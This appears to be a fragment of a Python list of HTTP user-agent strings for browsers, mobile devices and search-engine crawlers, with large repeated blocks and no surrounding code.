'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
